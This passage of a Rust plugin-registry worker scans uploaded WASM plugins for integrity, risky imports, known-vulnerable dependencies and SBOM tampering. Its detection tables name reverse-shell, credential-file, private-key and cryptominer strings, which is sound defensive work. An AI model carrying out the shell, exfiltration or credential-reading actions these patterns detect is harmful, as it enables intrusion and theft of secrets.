Skip to main content

mockforge_registry_server/workers/
plugin_scanner.rs

1//! Background worker that drains `plugin_security_scans` rows in the
2//! `"pending"` state, re-downloads the published WASM artifact, runs a set of
3//! integrity + static-analysis checks against it, and persists the result.
4//!
5//! The checks fall into three buckets:
6//!
7//! * **Storage integrity** — the artifact exists, downloads, and matches the
8//!   declared file size and SHA-256 checksum.
9//! * **Format validity** — bytes parse as a WebAssembly module via
10//!   `wasmparser`, with a parse-time budget to catch pathological inputs.
11//! * **Static analysis** — import/export inventory (unknown host namespaces,
12//!   high-risk WASI capabilities like `path_open` or `sock_*`), data-segment
13//!   byte-pattern scanning for hardcoded credentials, suspicious URLs, and
14//!   known-bad command strings, and section-size anomaly detection.
15//!
16//! **Isolation.** Every scan runs in `spawn_blocking` with a hard wall-clock
17//! timeout. A scan that panics or burns CPU past the budget fails the job
18//! (recorded as `"fail"` with a clear finding) but cannot take down the
19//! worker or the request-serving process. This is not a substitute for an
20//! out-of-process sandbox — the scanner still runs in the same address
21//! space as the server — but it bounds blast radius to a single thread and
22//! single scan.
23//!
24//! **What this explicitly does not do.** It does not execute the WASM
25//! module. It does not run dependency vulnerability checks against external
26//! advisory databases. It does not claim a passing verdict means the plugin
27//! is safe — only that no static red flag was raised. Dynamic sandbox
28//! execution in a subprocess is tracked separately.
29//!
30//! The worker is stateless: on every tick it re-queries for `status =
31//! 'pending'` rows, claims each by upserting a result, and moves on.
32//! Concurrent workers are safe because the upsert is idempotent — the last
33//! writer wins.
34
35use std::time::Duration;
36
37use serde_json::{json, Value as JsonValue};
38use sha2::{Digest, Sha256};
39use tracing::{debug, error, info, warn};
40use wasmparser::{Parser, Payload};
41
42use crate::storage::PluginStorage;
43use crate::AppState;
44
45const WORKER_INTERVAL: Duration = Duration::from_secs(30);
46const JOBS_PER_TICK: i64 = 10;
47
48/// Hard wall-clock limit for a single scan. A scan exceeding this is treated
49/// as a failure — a well-formed plugin artifact should parse in milliseconds
50/// even on a small instance; anything slower is either pathological input or
51/// a scanner bug we want visibility into.
52const SCAN_TIMEOUT: Duration = Duration::from_secs(15);
53
54/// Hard cap on how much of the WASM body we'll byte-scan for patterns. WASM
55/// artifacts larger than ~32 MiB are unusual for plugins, and data-segment
56/// scanning is O(n * patterns); this prevents a huge legitimate artifact
57/// from starving the worker.
58const BYTE_SCAN_BUDGET: usize = 32 * 1024 * 1024;
59
60/// Import namespaces the MockForge runtime is known to provide. Imports from
61/// any other namespace are surfaced as an "unknown host binding" finding —
62/// not necessarily malicious, but a signal the plugin expects a custom
63/// embedding the registry can't guarantee.
64const ALLOWED_IMPORT_NAMESPACES: &[&str] = &[
65    "wasi_snapshot_preview1",
66    "wasi_unstable",
67    "env",
68    "mockforge",
69    "mockforge_host",
70];
71
72/// WASI capabilities a well-behaved MockForge plugin should never need. These
73/// are coarse signals — a legitimate plugin might have a good reason to open
74/// sockets — but in a mock-API-server plugin context they warrant review.
75/// Each entry is `(import_name, severity, human_description)`.
76const HIGH_RISK_WASI_IMPORTS: &[(&str, &str, &str)] = &[
77    ("sock_open", "high", "opens outbound network sockets"),
78    ("sock_connect", "high", "initiates outbound network connections"),
79    ("sock_bind", "high", "binds to listening sockets"),
80    ("sock_accept", "high", "accepts inbound connections"),
81    ("path_open", "medium", "opens filesystem paths"),
82    ("path_create_directory", "medium", "creates directories"),
83    ("path_unlink_file", "medium", "deletes files"),
84    ("path_remove_directory", "medium", "removes directories"),
85    ("path_rename", "medium", "renames files"),
86    ("proc_exec", "critical", "executes external processes"),
87    ("proc_exit", "low", "exits the host process"),
88];
89
90/// Byte patterns that are almost certainly exfiltration or shell-injection
91/// markers if they appear inline in a plugin's data segments. Each is
92/// searched case-insensitively across the first `BYTE_SCAN_BUDGET` bytes of
93/// the artifact. Tuned conservatively: hits on very short tokens would noise
94/// up the report, so only high-signal strings land here.
95const SUSPICIOUS_BYTE_PATTERNS: &[(&[u8], &str, &str)] = &[
96    (b"/bin/sh -c", "critical", "shell command invocation"),
97    (b"/bin/bash -c", "critical", "shell command invocation"),
98    (b"curl http", "high", "hardcoded outbound curl URL"),
99    (b"wget http", "high", "hardcoded outbound wget URL"),
100    (b"nc -e", "critical", "reverse shell marker (netcat -e)"),
101    (b"/etc/passwd", "high", "attempts to read system credentials file"),
102    (b"/etc/shadow", "critical", "attempts to read system shadow file"),
103    (b"aws_access_key_id=", "critical", "hardcoded AWS access key"),
104    (b"AKIA", "medium", "possible AWS access key id"),
105    (b"-----BEGIN PRIVATE KEY-----", "critical", "embedded private key"),
106    (b"-----BEGIN RSA PRIVATE KEY-----", "critical", "embedded RSA private key"),
107    (b"-----BEGIN OPENSSH PRIVATE KEY-----", "critical", "embedded SSH private key"),
108    (b"xmr.pool", "critical", "cryptominer pool URL"),
109    (b"stratum+tcp", "critical", "cryptominer stratum URL"),
110];
111
112pub fn start_plugin_scanner_worker(state: AppState) {
113    tokio::spawn(async move {
114        // Initial tick so a just-published plugin gets scanned within ~30s of
115        // publish, rather than waiting a full interval.
116        let mut interval = tokio::time::interval(WORKER_INTERVAL);
117        interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
118
119        loop {
120            interval.tick().await;
121            if let Err(e) = run_once(&state).await {
122                error!("plugin scanner tick failed: {}", e);
123            }
124        }
125    });
126
127    info!(
128        "Plugin security scanner worker started (interval = {}s)",
129        WORKER_INTERVAL.as_secs()
130    );
131}
132
133async fn run_once(state: &AppState) -> anyhow::Result<()> {
134    let jobs = state.store.list_pending_security_scans(JOBS_PER_TICK).await?;
135    if jobs.is_empty() {
136        debug!("plugin scanner: no pending jobs");
137        return Ok(());
138    }
139
140    info!("plugin scanner: processing {} pending job(s)", jobs.len());
141
142    for job in jobs {
143        let plugin_version_id = job.plugin_version_id;
144        let declared_checksum = job.checksum.clone();
145        match scan_one(&state.storage, &job).await {
146            Ok(mut result) => {
147                // Cross-reference any SBOM the publisher submitted against
148                // the vulnerability list before we persist the result, so
149                // findings from both static + dependency analysis land in
150                // one row. Before trusting package names, verify the SBOM
151                // is bound to *this* artifact by checksum — otherwise a
152                // publisher could submit a clean SBOM for a dirty WASM.
153                if let Ok(Some(sbom)) = state.store.get_plugin_version_sbom(plugin_version_id).await
154                {
155                    let trust = verify_sbom_binding(&sbom, &declared_checksum);
156                    record_sbom_binding(&mut result, &trust);
157
158                    // Surface publisher attestation when one is recorded.
159                    // This is strictly additive — a missing attestation
160                    // doesn't downgrade the score; a *present* one just
161                    // earns a positive finding, which the UI can display
162                    // distinctly from the generic "SBOM bound" case.
163                    if let Ok(Some((key_id, signed_at))) =
164                        state.store.get_plugin_version_attestation(plugin_version_id).await
165                    {
166                        append_finding(
167                            &mut result,
168                            json!({
169                                "severity": "info",
170                                "category": "supply_chain",
171                                "title": "Verified publisher attestation",
172                                "description": format!(
173                                    "SBOM was signed by a public key ({}) registered to the publishing account on {}. The account vouches for the dependency list.",
174                                    key_id,
175                                    signed_at.to_rfc3339()
176                                )
177                            }),
178                        );
179                    }
180
181                    if matches!(trust, SbomBinding::Bound) {
182                        apply_sbom_findings_async(&*state.store, &mut result, &sbom).await;
183                    }
184                }
185                if let Err(e) = state
186                    .store
187                    .upsert_plugin_security_scan(
188                        plugin_version_id,
189                        &result.status,
190                        result.score,
191                        &result.findings,
192                        Some(env!("CARGO_PKG_VERSION")),
193                    )
194                    .await
195                {
196                    error!(
197                        plugin = %job.plugin_name,
198                        version = %job.version,
199                        "failed to persist scan result: {}",
200                        e
201                    );
202                }
203            }
204            Err(e) => {
205                // We surface the scan infrastructure failure as a "fail"
206                // result rather than leaving the row pending forever.
207                // Operators get a signal from the finding body; users see a
208                // clear "could not scan" status instead of silence.
209                warn!(
210                    plugin = %job.plugin_name,
211                    version = %job.version,
212                    "scan failed: {}",
213                    e
214                );
215                let findings = json!([
216                    {
217                        "severity": "high",
218                        "category": "other",
219                        "title": "Security scan could not complete",
220                        "description": format!(
221                            "The registry was unable to finish scanning this artifact: {}. An operator will need to retry.",
222                            e
223                        )
224                    }
225                ]);
226                if let Err(persist_err) = state
227                    .store
228                    .upsert_plugin_security_scan(
229                        plugin_version_id,
230                        "fail",
231                        0,
232                        &findings,
233                        Some(env!("CARGO_PKG_VERSION")),
234                    )
235                    .await
236                {
237                    error!(
238                        plugin = %job.plugin_name,
239                        version = %job.version,
240                        "failed to persist scan error: {}",
241                        persist_err
242                    );
243                }
244            }
245        }
246    }
247
248    Ok(())
249}
250
251struct ScanOutcome {
252    status: String,
253    score: i16,
254    findings: JsonValue,
255}
256
257async fn scan_one(
258    storage: &PluginStorage,
259    job: &mockforge_registry_core::models::PendingScanJob,
260) -> anyhow::Result<ScanOutcome> {
261    let key = PluginStorage::plugin_object_key(&job.plugin_name, &job.version)?;
262    let bytes = storage.download_plugin(&key).await?;
263    let declared_size = job.file_size;
264    let declared_checksum = job.checksum.clone();
265
266    // Prefer the dedicated `mockforge-plugin-scanner` subprocess when it's on
267    // PATH — it carries the wasmtime engine into its own process so any
268    // wasmtime-level compile/link misbehavior crashes the subprocess rather
269    // than the server. Fall back to in-process static analysis when the
270    // binary isn't installed (dev environments, tests, containers that omit
271    // the scanner-bin feature).
272    if let Some(path) = scanner_binary_path() {
273        match run_subprocess_scan(&path, &bytes, declared_size, &declared_checksum).await {
274            Ok(outcome) => return Ok(outcome),
275            Err(e) => {
276                // Subprocess failure is surfaced as a warning and we fall
277                // back to the in-process scanner; losing coverage on
278                // dynamic instantiation is still better than leaving the
279                // row pending indefinitely.
280                warn!(
281                    plugin = %job.plugin_name,
282                    version = %job.version,
283                    "subprocess scanner failed ({}) — falling back to in-process analysis",
284                    e
285                );
286            }
287        }
288    }
289
290    // The static analysis walk is CPU-bound and can panic on
291    // malicious/pathological inputs (wasmparser fuzzers have found real
292    // panics in the past). Running it on a blocking pool gives us:
293    //   1. tokio::time::timeout enforcement — a runaway scan can't starve
294    //      the worker's async runtime thread.
295    //   2. panic isolation — `spawn_blocking` turns a panic into a
296    //      `JoinError`, which we report as a scan failure instead of
297    //      crashing the process.
298    let scan_fut = tokio::task::spawn_blocking(move || {
299        analyze_bytes(&bytes, declared_size, declared_checksum.as_str())
300    });
301
302    let join_result = match tokio::time::timeout(SCAN_TIMEOUT, scan_fut).await {
303        Ok(res) => res,
304        Err(_) => {
305            return Ok(ScanOutcome {
306                status: "fail".to_string(),
307                score: 0,
308                findings: JsonValue::Array(vec![json!({
309                    "severity": "high",
310                    "category": "other",
311                    "title": "Scan timed out",
312                    "description": format!(
313                        "Static analysis exceeded the {}s budget. This usually means a pathological WASM input; the artifact is rejected until a manual review runs.",
314                        SCAN_TIMEOUT.as_secs()
315                    )
316                })]),
317            });
318        }
319    };
320
321    match join_result {
322        Ok(outcome) => Ok(outcome),
323        Err(join_err) => {
324            // Panic inside the scanner — surface it as a failure rather
325            // than bubbling the panic up into the worker loop.
326            Ok(ScanOutcome {
327                status: "fail".to_string(),
328                score: 0,
329                findings: JsonValue::Array(vec![json!({
330                    "severity": "critical",
331                    "category": "other",
332                    "title": "Scanner panicked",
333                    "description": format!(
334                        "The static scanner panicked while processing this artifact: {}. This is a scanner bug — the plugin has been marked failed pending investigation.",
335                        join_err
336                    )
337                })]),
338            })
339        }
340    }
341}
342
343/// Resolve the scanner binary. `MOCKFORGE_PLUGIN_SCANNER_BIN` overrides the
344/// default ("mockforge-plugin-scanner" on PATH) so deployers can point at an
345/// absolute path or a harness-specific build.
346fn scanner_binary_path() -> Option<String> {
347    if let Ok(path) = std::env::var("MOCKFORGE_PLUGIN_SCANNER_BIN") {
348        if !path.trim().is_empty() {
349            return Some(path);
350        }
351    }
352    // We don't verify PATH here — Command will fail with NotFound if the
353    // binary is missing, which the caller treats as a soft error.
354    Some("mockforge-plugin-scanner".to_string())
355}
356
357async fn run_subprocess_scan(
358    scanner_path: &str,
359    bytes: &[u8],
360    declared_size: i64,
361    declared_checksum: &str,
362) -> anyhow::Result<ScanOutcome> {
363    // Drop bytes into a tempfile because the scanner takes `--wasm-path`.
364    // Using a tempfile (rather than piping on stdin) lets the scanner
365    // mmap/seek arbitrarily and keeps the CLI contract simple. File IO is
366    // blocking, so we stay on `spawn_blocking` for both the create and the
367    // write — it comes back as a path we own.
368    let bytes_owned = bytes.to_vec();
369    let tmp_path = tokio::task::spawn_blocking(move || -> std::io::Result<_> {
370        use std::io::Write;
371        let mut tmp = tempfile::NamedTempFile::new()?;
372        tmp.write_all(&bytes_owned)?;
373        tmp.flush()?;
374        // Keep the handle alive so the path stays valid until we drop it.
375        Ok(tmp.into_temp_path())
376    })
377    .await??;
378
379    let mut cmd = tokio::process::Command::new(scanner_path);
380    cmd.arg("--wasm-path")
381        .arg::<&std::path::Path>(tmp_path.as_ref())
382        .arg("--checksum")
383        .arg(declared_checksum)
384        .arg("--declared-size")
385        .arg(declared_size.to_string())
386        .kill_on_drop(true)
387        .stdout(std::process::Stdio::piped())
388        .stderr(std::process::Stdio::piped());
389
390    let output_fut = cmd.output();
391    let output = match tokio::time::timeout(SCAN_TIMEOUT, output_fut).await {
392        Ok(res) => res?,
393        Err(_) => {
394            anyhow::bail!(
395                "subprocess scanner exceeded {}s wall-clock budget",
396                SCAN_TIMEOUT.as_secs()
397            );
398        }
399    };
400
401    // Tempfile is cleaned up on drop, but we've already read the output so
402    // we're done with it. Explicit drop makes the lifetime visible.
403    drop(tmp_path);
404
405    if !output.status.success() {
406        anyhow::bail!(
407            "subprocess scanner exited with {}: {}",
408            output.status,
409            String::from_utf8_lossy(&output.stderr).trim()
410        );
411    }
412
413    let report: SubprocessReport = serde_json::from_slice(&output.stdout).map_err(|e| {
414        anyhow::anyhow!(
415            "subprocess scanner returned invalid JSON: {} (stdout was: {:?})",
416            e,
417            String::from_utf8_lossy(&output.stdout)
418        )
419    })?;
420
421    // The subprocess produces `snake_case` severity/category strings via the
422    // serde derives in `scanner.rs`. We forward the payload as a JSON Value
423    // array so downstream UI/storage code doesn't have to care where the
424    // scan ran.
425    let findings = serde_json::to_value(&report.findings)?;
426
427    Ok(ScanOutcome {
428        status: report.status,
429        score: report.score,
430        findings,
431    })
432}
433
434#[derive(Debug, serde::Deserialize)]
435struct SubprocessReport {
436    status: String,
437    score: i16,
438    findings: Vec<SubprocessFinding>,
439    #[allow(dead_code)]
440    dynamic_instantiable: bool,
441    #[allow(dead_code)]
442    duration_ms: u128,
443}
444
445#[derive(Debug, serde::Deserialize, serde::Serialize)]
446struct SubprocessFinding {
447    severity: String,
448    category: String,
449    title: String,
450    description: String,
451}
452
453fn analyze_bytes(bytes: &[u8], declared_size: i64, declared_checksum: &str) -> ScanOutcome {
454    let mut findings: Vec<JsonValue> = Vec::new();
455    let mut score: i16 = 100;
456
457    // --- Storage integrity ---------------------------------------------
458
459    let actual_size = bytes.len() as i64;
460    if actual_size != declared_size {
461        findings.push(json!({
462            "severity": "high",
463            "category": "other",
464            "title": "Artifact size mismatch",
465            "description": format!(
466                "Stored artifact is {} bytes but the publish request declared {}.",
467                actual_size, declared_size
468            )
469        }));
470        score -= 40;
471    }
472
473    let computed = {
474        let mut hasher = Sha256::new();
475        hasher.update(bytes);
476        hex_encode(&hasher.finalize())
477    };
478    if !computed.eq_ignore_ascii_case(declared_checksum) {
479        findings.push(json!({
480            "severity": "critical",
481            "category": "supply_chain",
482            "title": "Checksum mismatch",
483            "description": format!(
484                "SHA-256 of stored artifact ({}) does not match the checksum recorded at publish time ({}).",
485                computed, declared_checksum
486            )
487        }));
488        score = score.saturating_sub(60);
489    }
490
491    // --- Magic bytes + version ----------------------------------------
492
493    if bytes.len() < 8 || &bytes[0..4] != b"\0asm" {
494        findings.push(json!({
495            "severity": "critical",
496            "category": "other",
497            "title": "Not a valid WebAssembly module",
498            "description": "Artifact does not begin with the WASM magic bytes (\\0asm). It cannot be loaded by any MockForge runtime.",
499        }));
500        return ScanOutcome {
501            status: "fail".to_string(),
502            score: 0,
503            findings: JsonValue::Array(findings),
504        };
505    }
506
507    // WASM binary spec version is u32 LE immediately after magic. Spec
508    // currently only defines version 1; anything else is either an
509    // unfinished proposal or garbage.
510    let version = u32::from_le_bytes([bytes[4], bytes[5], bytes[6], bytes[7]]);
511    if version != 1 {
512        findings.push(json!({
513            "severity": "medium",
514            "category": "other",
515            "title": "Unexpected WASM binary version",
516            "description": format!(
517                "Module declares WASM binary version {} — the only currently-stable value is 1. This may indicate an experimental toolchain.",
518                version
519            )
520        }));
521        score = score.saturating_sub(10);
522    }
523
524    // --- Structured static analysis (parses sections) ------------------
525
526    let mut import_count = 0u32;
527    let mut unknown_namespaces = std::collections::BTreeSet::new();
528    let mut high_risk_imports: Vec<(String, &'static str, &'static str)> = Vec::new();
529    let mut export_count = 0u32;
530    let mut has_plugin_entrypoint = false;
531    let mut data_segment_bytes: usize = 0;
532    let mut parse_error: Option<String> = None;
533
534    let parser = Parser::new(0);
535    for payload in parser.parse_all(bytes) {
536        match payload {
537            Ok(Payload::ImportSection(reader)) => {
538                for import in reader {
539                    match import {
540                        Ok(imp) => {
541                            import_count += 1;
542                            let ns = imp.module;
543                            if !ALLOWED_IMPORT_NAMESPACES.contains(&ns) {
544                                unknown_namespaces.insert(ns.to_string());
545                            }
546                            if ns.starts_with("wasi") {
547                                if let Some(entry) =
548                                    HIGH_RISK_WASI_IMPORTS.iter().find(|(n, _, _)| *n == imp.name)
549                                {
550                                    high_risk_imports.push((
551                                        format!("{}::{}", ns, imp.name),
552                                        entry.1,
553                                        entry.2,
554                                    ));
555                                }
556                            }
557                        }
558                        Err(e) => {
559                            parse_error = Some(format!("malformed import: {}", e));
560                            break;
561                        }
562                    }
563                }
564            }
565            Ok(Payload::ExportSection(reader)) => {
566                for export in reader {
567                    match export {
568                        Ok(exp) => {
569                            export_count += 1;
570                            // MockForge plugins conventionally export at
571                            // least one function starting with
572                            // `_mockforge_` or `mockforge_plugin_`. Absence
573                            // isn't fatal (some toolchains mangle names)
574                            // but presence is a positive signal.
575                            if exp.name.starts_with("_mockforge_")
576                                || exp.name.starts_with("mockforge_plugin_")
577                                || exp.name == "_start"
578                            {
579                                has_plugin_entrypoint = true;
580                            }
581                        }
582                        Err(e) => {
583                            parse_error = Some(format!("malformed export: {}", e));
584                            break;
585                        }
586                    }
587                }
588            }
589            Ok(Payload::DataSection(reader)) => {
590                for segment in reader {
591                    match segment {
592                        Ok(seg) => {
593                            data_segment_bytes = data_segment_bytes.saturating_add(seg.data.len());
594                        }
595                        Err(e) => {
596                            parse_error = Some(format!("malformed data segment: {}", e));
597                            break;
598                        }
599                    }
600                }
601            }
602            Ok(_) => {}
603            Err(e) => {
604                parse_error = Some(e.to_string());
605                break;
606            }
607        }
608    }
609
610    if let Some(err) = parse_error {
611        findings.push(json!({
612            "severity": "high",
613            "category": "other",
614            "title": "WASM module failed to parse",
615            "description": format!("wasmparser rejected the module: {}", err),
616        }));
617        score = score.saturating_sub(40);
618    }
619
620    // Unknown host namespaces — one finding per namespace so the UI shows
621    // the specific import that won't resolve.
622    if !unknown_namespaces.is_empty() {
623        score = score.saturating_sub(15);
624        for ns in &unknown_namespaces {
625            findings.push(json!({
626                "severity": "medium",
627                "category": "supply_chain",
628                "title": "Unknown host import namespace",
629                "description": format!(
630                    "Plugin imports from '{}', which is not provided by any MockForge runtime binding.",
631                    ns
632                )
633            }));
634        }
635    }
636
637    // High-risk WASI capabilities. Severity is driven by the table above so
638    // e.g. `proc_exec` becomes critical, `path_open` stays medium.
639    for (full_name, severity, human) in &high_risk_imports {
640        let penalty: i16 = match *severity {
641            "critical" => 40,
642            "high" => 20,
643            "medium" => 8,
644            _ => 3,
645        };
646        score = score.saturating_sub(penalty);
647        findings.push(json!({
648            "severity": severity,
649            "category": "insecure_coding",
650            "title": format!("High-risk WASI import: {}", full_name),
651            "description": format!(
652                "This plugin imports a capability that {}. MockForge plugins usually do not need this — review carefully before using.",
653                human
654            )
655        }));
656    }
657
658    // Missing plugin entrypoint is informational, not a deduction. We only
659    // flag it if we saw at least one export; a module with zero exports is
660    // already a separate concern.
661    if export_count > 0 && !has_plugin_entrypoint {
662        findings.push(json!({
663            "severity": "info",
664            "category": "other",
665            "title": "No MockForge plugin entrypoint found",
666            "description": "No exported function matched '_mockforge_*', 'mockforge_plugin_*', or '_start'. This may just be a naming convention mismatch, but the plugin runtime may fail to load it."
667        }));
668    }
669
670    // Inventory finding so the UI shows what the module looks like at a
671    // glance even when everything is clean.
672    findings.push(json!({
673        "severity": "info",
674        "category": "other",
675        "title": "Module inventory",
676        "description": format!(
677            "{} import(s), {} export(s), {} byte(s) in data segments.",
678            import_count, export_count, data_segment_bytes
679        )
680    }));
681
682    // --- Byte-pattern scan across the whole artifact -------------------
683
684    let scan_slice = if bytes.len() > BYTE_SCAN_BUDGET {
685        &bytes[..BYTE_SCAN_BUDGET]
686    } else {
687        bytes
688    };
689    let lowered = scan_slice.to_ascii_lowercase();
690    for (pattern, severity, description) in SUSPICIOUS_BYTE_PATTERNS {
691        let needle = pattern.to_ascii_lowercase();
692        if contains_subslice(&lowered, &needle) {
693            let penalty: i16 = match *severity {
694                "critical" => 50,
695                "high" => 25,
696                "medium" => 10,
697                _ => 5,
698            };
699            score = score.saturating_sub(penalty);
700            findings.push(json!({
701                "severity": severity,
702                "category": "malware",
703                "title": format!("Suspicious byte pattern: {}", description),
704                "description": format!(
705                    "Artifact contains the byte pattern '{}'. This is a strong signal of {}.",
706                    String::from_utf8_lossy(pattern),
707                    description
708                )
709            }));
710        }
711    }
712
713    if bytes.len() > BYTE_SCAN_BUDGET {
714        findings.push(json!({
715            "severity": "info",
716            "category": "other",
717            "title": "Artifact exceeds byte-scan budget",
718            "description": format!(
719                "Only the first {} bytes were scanned for byte patterns. Artifacts larger than this cap should be reviewed manually.",
720                BYTE_SCAN_BUDGET
721            )
722        }));
723    }
724
725    // --- Verdict -------------------------------------------------------
726
727    let clamped = score.clamp(0, 100);
728    let status = if clamped >= 70 {
729        "pass"
730    } else if clamped >= 40 {
731        "warning"
732    } else {
733        "fail"
734    };
735
736    ScanOutcome {
737        status: status.to_string(),
738        score: clamped,
739        findings: JsonValue::Array(findings),
740    }
741}
742
743/// `bytes.windows(needle.len()).any(|w| w == needle)` — split out so the
744/// tests can exercise it directly and the hot byte scan doesn't build an
745/// iterator per pattern.
746fn contains_subslice(haystack: &[u8], needle: &[u8]) -> bool {
747    if needle.is_empty() || needle.len() > haystack.len() {
748        return false;
749    }
750    haystack.windows(needle.len()).any(|w| w == needle)
751}
752
753/// A tiny hardcoded vulnerability feed. Each entry covers one known-bad
754/// package (`ecosystem`, `name`, `version` OR version prefix), mirrored with
755/// a severity and human description. Real deployments should replace this
756/// with a live feed (OSV, GHSA, Snyk) — the function is structured to make
757/// that swap easy: swap the constant for a lookup, keep the rest.
758///
759/// Keeping a short hardcoded list in-tree still delivers visible value:
760/// known-bad fixtures like `event-stream@3.3.6` (the 2018 npm compromise)
761/// or `colors@1.4.1` (the 2022 sabotage) surface immediately, and tests
762/// can pin behavior without a network call.
763const KNOWN_VULNERABLE_PACKAGES: &[(&str, &str, &str, &str, &str)] = &[
764    // (ecosystem, name, version_prefix, severity, description)
765    (
766        "npm",
767        "event-stream",
768        "3.3.6",
769        "critical",
770        "event-stream@3.3.6 shipped a malicious payload (flatmap-stream) targeting a specific bitcoin wallet library (2018).",
771    ),
772    (
773        "npm",
774        "flatmap-stream",
775        "0.1.1",
776        "critical",
777        "flatmap-stream@0.1.1 was the vehicle for the event-stream supply-chain compromise.",
778    ),
779    (
780        "npm",
781        "colors",
782        "1.4.1",
783        "high",
784        "colors@1.4.1 was intentionally sabotaged by the maintainer to emit garbage output (2022).",
785    ),
786    (
787        "npm",
788        "faker",
789        "6.6.6",
790        "high",
791        "faker@6.6.6 was intentionally broken by the maintainer (2022).",
792    ),
793    (
794        "npm",
795        "ua-parser-js",
796        "0.7.29",
797        "high",
798        "ua-parser-js@0.7.29 had a credential-stealer injected during a brief maintainer compromise.",
799    ),
800    (
801        "cargo",
802        "rustdecimal",
803        "",
804        "critical",
805        "rustdecimal (all versions) was a typosquat of rust_decimal hosting a malicious payload.",
806    ),
807    (
808        "cargo",
809        "openssl-src",
810        "111.0.",
811        "high",
812        "openssl-src 111.0.x bundles very old OpenSSL with several CVEs. Upgrade to 300.x or later.",
813    ),
814    (
815        "pypi",
816        "ctx",
817        "",
818        "critical",
819        "ctx on PyPI was hijacked in 2022 and replaced with a credential exfiltrator; any version pins are suspect.",
820    ),
821];
822
823/// Is the SBOM the publisher submitted actually about the artifact we just
824/// scanned? CycloneDX 1.4+ lets a document declare its primary component
825/// under `metadata.component.hashes` (array of `{ alg, content }`); we
826/// check there first, then fall back to any top-level `components[i]` whose
827/// `purl` or `name` matches the plugin name.
828///
829/// Outcomes:
830///   * [`SbomBinding::Bound`] — a `SHA-256` hash in the SBOM matches the
831///     artifact's declared checksum. Findings from this SBOM are trusted.
832///   * [`SbomBinding::Unsigned`] — no digest was declared. We surface an
833///     info-level finding and *skip* vulnerability scanning — better to
834///     say nothing than to accept unverified claims.
835///   * [`SbomBinding::Mismatch { declared }`] — the SBOM claims a
836///     different artifact than the one we're looking at. Critical finding,
837///     vuln scan skipped.
838#[derive(Debug)]
839enum SbomBinding {
840    Bound,
841    Unsigned,
842    Mismatch { declared: String },
843}
844
845fn verify_sbom_binding(sbom: &JsonValue, expected_checksum: &str) -> SbomBinding {
846    let expected = expected_checksum.to_ascii_lowercase();
847
848    // Collect every SHA-256 digest visible in the document, anywhere a
849    // CycloneDX-style `hashes` array might appear.
850    let mut declared: Vec<String> = Vec::new();
851    collect_sha256_hashes(sbom, &mut declared);
852
853    if declared.is_empty() {
854        return SbomBinding::Unsigned;
855    }
856
857    for d in &declared {
858        if d.eq_ignore_ascii_case(&expected) {
859            return SbomBinding::Bound;
860        }
861    }
862
863    // Declared at least one digest but none matched — actively lying, not
864    // just missing.
865    SbomBinding::Mismatch {
866        declared: declared.into_iter().next().unwrap_or_default(),
867    }
868}
869
870/// Walk the SBOM JSON looking for `hashes` arrays shaped like
871/// `[{ "alg": "SHA-256", "content": "..." }]`. Lowercase the contents so
872/// the caller compares case-insensitively.
873fn collect_sha256_hashes(node: &JsonValue, out: &mut Vec<String>) {
874    match node {
875        JsonValue::Object(map) => {
876            if let Some(JsonValue::Array(hashes)) = map.get("hashes") {
877                for h in hashes {
878                    let alg =
879                        h.get("alg").and_then(|v| v.as_str()).unwrap_or("").to_ascii_lowercase();
880                    let content = h.get("content").and_then(|v| v.as_str()).unwrap_or("");
881                    if (alg == "sha-256" || alg == "sha256") && !content.is_empty() {
882                        out.push(content.to_ascii_lowercase());
883                    }
884                }
885            }
886            for v in map.values() {
887                collect_sha256_hashes(v, out);
888            }
889        }
890        JsonValue::Array(arr) => {
891            for v in arr {
892                collect_sha256_hashes(v, out);
893            }
894        }
895        _ => {}
896    }
897}
898
899fn record_sbom_binding(outcome: &mut ScanOutcome, binding: &SbomBinding) {
900    match binding {
901        SbomBinding::Bound => {
902            append_finding(
903                outcome,
904                json!({
905                    "severity": "info",
906                    "category": "supply_chain",
907                    "title": "SBOM bound to artifact",
908                    "description": "SBOM contains a SHA-256 digest matching the published WASM. Dependency findings below are derived from this verified SBOM."
909                }),
910            );
911        }
912        SbomBinding::Unsigned => {
913            append_finding(
914                outcome,
915                json!({
916                    "severity": "medium",
917                    "category": "supply_chain",
918                    "title": "SBOM not bound to artifact",
919                    "description": "SBOM did not declare a SHA-256 hash for the artifact. Without a hash there's no way to prove this SBOM describes the WASM being published — dependency scanning was skipped. Add a `hashes: [{alg: \"SHA-256\", content: \"...\"}]` entry to metadata.component or the matching components[] row."
920                }),
921            );
922            // Unbound SBOM is a supply-chain weakness, but not fatal.
923            let current = outcome.score as i32;
924            let new = (current - 5).clamp(0, 100);
925            outcome.score = new as i16;
926        }
927        SbomBinding::Mismatch { declared } => {
928            append_finding(
929                outcome,
930                json!({
931                    "severity": "critical",
932                    "category": "supply_chain",
933                    "title": "SBOM claims a different artifact",
934                    "description": format!(
935                        "SBOM declared SHA-256 `{}`, but the published artifact hashes to a different value. The SBOM is not about this WASM — dependency scanning was skipped and the artifact is marked fail.",
936                        declared
937                    )
938                }),
939            );
940            // Very strong signal of supply-chain tampering.
941            let current = outcome.score as i32;
942            let new = (current - 60).clamp(0, 100);
943            outcome.score = new as i16;
944            outcome.status = if new >= 70 {
945                outcome.status.clone()
946            } else if new >= 40 {
947                "warning".to_string()
948            } else {
949                "fail".to_string()
950            };
951        }
952    }
953}
954
955/// DB-backed variant of `apply_sbom_findings`. Walks the SBOM components
956/// and looks each up in the `osv_vulnerabilities` cache. Falls back to the
957/// hardcoded list only when the cache is empty (fresh install before the
958/// first OSV sync has run) — in steady state we want real advisories.
959async fn apply_sbom_findings_async(
960    store: &dyn crate::store::RegistryStore,
961    outcome: &mut ScanOutcome,
962    sbom: &JsonValue,
963) {
964    let cache_empty = store.count_osv_advisories().await.unwrap_or(0) == 0;
965    if cache_empty {
966        // Bootstrap path: no live data yet, keep the hardcoded list
967        // active so the scanner isn't silent on fresh installs.
968        apply_sbom_findings(outcome, sbom);
969        append_finding(
970            outcome,
971            json!({
972                "severity": "info",
973                "category": "other",
974                "title": "Using seed vulnerability list",
975                "description": "OSV advisory cache is empty — the scanner fell back to the built-in seed list. Run the osv_sync worker to populate the cache."
976            }),
977        );
978        return;
979    }
980
981    let components = match sbom.get("components").and_then(|c| c.as_array()) {
982        Some(c) => c,
983        None => {
984            append_finding(
985                outcome,
986                json!({
987                    "severity": "info",
988                    "category": "other",
989                    "title": "SBOM has no 'components' array",
990                    "description": "Expected CycloneDX-shaped SBOM with a top-level 'components' array. Vulnerability check skipped."
991                }),
992            );
993            return;
994        }
995    };
996
